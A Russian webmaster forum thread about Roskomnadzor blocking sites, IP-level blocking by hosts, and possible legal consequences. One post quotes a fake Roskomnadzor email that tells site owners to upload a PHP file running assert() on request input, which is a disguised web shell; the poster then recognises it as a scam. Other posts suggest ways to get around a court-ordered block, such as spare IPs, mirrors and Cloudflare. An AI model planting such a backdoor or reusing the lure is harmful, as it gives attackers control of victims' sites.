Роскомнадзор внес меня в реестр

1 234
Y1
На сайте с 31.08.2011
85
A007MP:
Скорее всего, провайдеры блокируют не по ip, а по доменному имени

Как раз наоборот

вот какой ответ я получил от службы поддержки хостинга (я спрашивал почему полностью заблокировали сайт а не отключили его для РФ)

К сожалению ограничение доступа к сайту с российских подсетей не решает проблемы блокировки IP-адреса сервера виртуального хостинга со стороны интернет-провайдеров. Основным условием является отсутствие этого домена на сервере. Если домен будет оставаться работать на этом сервере, даже при условии ограничения доступа из определённых подсетей, автоматика интернет-провайдеров будет блокировать IP-адрес сервера, а это означает, что в сети будет недоступен не только Ваш сайт, но и все сайты, расположенные на данном сервере.

занчит блокируют по IP

а это значит, что использование динамического IP должно решить проблему, например, с помощью _dnsmadeeasy.com или подобных

на худой конец можно подключить к cloudflare это по крайней мере поможет скрыть ваш хостинг и предотвратить ограничение доступа к сайту со стороны хостинга как это было в моем случае

AP
На сайте с 12.06.2015
74
Yuriy1983:
Как раз наоборот
вот какой ответ я получил от службы поддержки хостинга (я спрашивал почему полностью заблокировали сайт а не отключили его для РФ)

занчит блокируют по IP

Так я не понял, Вам провайдер заблокировал доступ, или хостинг отключил сайт? Если первое, то это плохой провайдер, который по ip блокирует, но в любом случае, у других провайдеров (и уж тем более за рубежом) сайт доступен. Если хостинг, то надо именно с ним решать проблему, так как доступ вообще к сайту заблокирован.

Y1
На сайте с 31.08.2011
85
A007MP:
Так я не понял, Вам провайдер заблокировал доступ, или хостинг отключил сайт? Если первое, то это плохой провайдер, который по ip блокирует, но в любом случае, у других провайдеров (и уж тем более за рубежом) сайт доступен. Если хостинг, то надо именно с ним решать проблему, так как доступ вообще к сайту заблокирован.

Роскомнадзор отправил письмо хостеру тот обязан подчиняться и блокировать сайт. Кроме этого в письме было сказано, что сайт будет внесен в реестр (пока еще там его нет но это ненадолго).

Я спросил у хостера почему полностью блокирует сайт, а не для РФ только. Тк логично, что законодательство других стран не нарушено и получил ответ выше. Когда он попадет в реестр он будет заблокирован только для РФ

судя по ответу хостера блокировка идет именно по IP поэтому они подчиняются и если хостер не подчинится заблокируют целый сервак со всеми сайтами

Y1
На сайте с 31.08.2011
85

Мне вот интересно, а применить ко мне другие санкции кроме блокировки могут?

Как-то неохото терять сайт, много сил вложено, пусть под фильтром но все же.

Причина "Осуществление незаконной деятельности по организации и проведению лотерей без разрешения Правительства Российской Федерации" не так уж и безвинна, мало чего там стуканет им, потом попробуй докажи

W
На сайте с 10.05.2009
114

Перезжайте на впс, желательно на тот где дадут два ип, второй не трогайте, переклеивайте себе спокойно сайт, когда переклеится, зеркало разместите на втором ип. А там уже как повезет, в любом случае хостинг мозги трахать не будет из серии - забанят ип, пострадают не в чем невинные сайты

Cruzo
На сайте с 04.10.2010
40

Извините, что в этом топике спрашиваю, Тоже получил на почту от Роскомнадзора "Уведомление о внесении сайта www.XXXXXXXXXX в реестр организаторов распространения информации в сети «Интернет»".

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.ххххххххххх.ru в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2¬1618/2015, Ваш сайт www.хххххххххххх.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени www.ххххххххх.ru, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr

2. Cоздать в данной папке файл reestr-id127034.php, содержащий следующий текст:

< ?php

/*Подтверждение доменного имени www.хххххххххх.ru*/

assert(stripslashes($_REQUEST[roskomnadzor]));

?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: www.ххххххххххххх.ru/reestr/reestr-id127034.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.ххххххххх.ru, следую инструкции указанной выше, то Ваш сайт www.ххххххххххххх.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------

С уважением,

ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

Кто может подсказать, как реагировать в этом случае? Сайт пока нормально работает.

---------- Добавлено 01.09.2015 в 23:12 ----------

Извиняюсь, уже понял, что это лажа.

Y1
На сайте с 31.08.2011
85

Если оставлю сайт юридические последствия могут быть для меня какие-нибудь?

Digdug
На сайте с 11.07.2012
119
Айратиус:
Ну посмотрите историю когда 136 сайтов забанили и сегодняшнее число. Математика и логика.

На какую страницу ссылался Роскомнадзор? Что на ней было?

А
На сайте с 27.08.2013
110
Digdug:
На какую страницу ссылался Роскомнадзор? Что на ней было?

Нет определенной страницы, был только весь сайт. И это не развод типа от роскомнадзора, эта тема уже поднималась на этом форуме.

Короче в письме указывалось что надо закрыть весь сайт(( Уже забанили(((

Пока никаких мер не предпринял.

Интересно можно им по поводу адалт сайта написать? или это окончательно

Y1
На сайте с 31.08.2011
85
Айратиус:
Интересно можно им по поводу адалт сайта написать? или это окончательно

А смысл писать если там решение суда, только судом может быть отменено

1 234

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий